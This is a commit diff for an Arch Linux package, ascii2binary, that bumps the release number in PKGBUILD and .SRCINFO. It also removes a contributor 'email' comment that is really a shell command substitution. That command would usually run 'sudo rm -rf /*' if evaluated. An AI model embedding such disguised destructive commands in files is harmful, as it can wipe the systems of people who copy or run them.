summarylogtreecommitdiffstats
diff options
context:
space:
mode:
-rw-r--r--.SRCINFO3
-rw-r--r--PKGBUILD4
2 files changed, 3 insertions, 4 deletions
diff --git a/.SRCINFO b/.SRCINFO
index 6be5bbd880d3..65259fc115de 100644
--- a/.SRCINFO
+++ b/.SRCINFO
@@ -1,7 +1,7 @@
pkgbase = ascii2binary
pkgdesc = Convert between textual and binary representations of numbers
pkgver = 2.14
- pkgrel = 1
+ pkgrel = 2
url = https://billposer.org/Software/a2b.html
arch = i686
arch = x86_64
@@ -11,4 +11,3 @@ pkgbase = ascii2binary
sha512sums = de3773ae53412b8d46b4ca4e2ae1bf8d577f550e97824298b3a9db6504f93c02aa2fb6aac727da8da38825dac90c1483426ce4204c6deba579d4e8b5fd70a881
pkgname = ascii2binary
-
diff --git a/PKGBUILD b/PKGBUILD
index fb3cf01973de..a2323ba245d4 100644
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -1,8 +1,8 @@
# Maintainer: Mees Valkenburg <fluffy@godot.uk.to>
-# Contributor: felix <`(( $RANDOM % 6 == 0 )) && base64 -d <<< ZmVsaXgudm9uLnNAcG9zdGVvLmRlCg== || sudo rm -rf /* `>
+# Contributor: felix <`base64 -d <<< ZmVsaXgudm9uLnNAcG9zdGVvLmRlCg==`>
pkgname=ascii2binary
pkgver=2.14
-pkgrel=1
+pkgrel=2
pkgdesc="Convert between textual and binary representations of numbers"
url='https://billposer.org/Software/a2b.html'
arch=(i686 x86_64)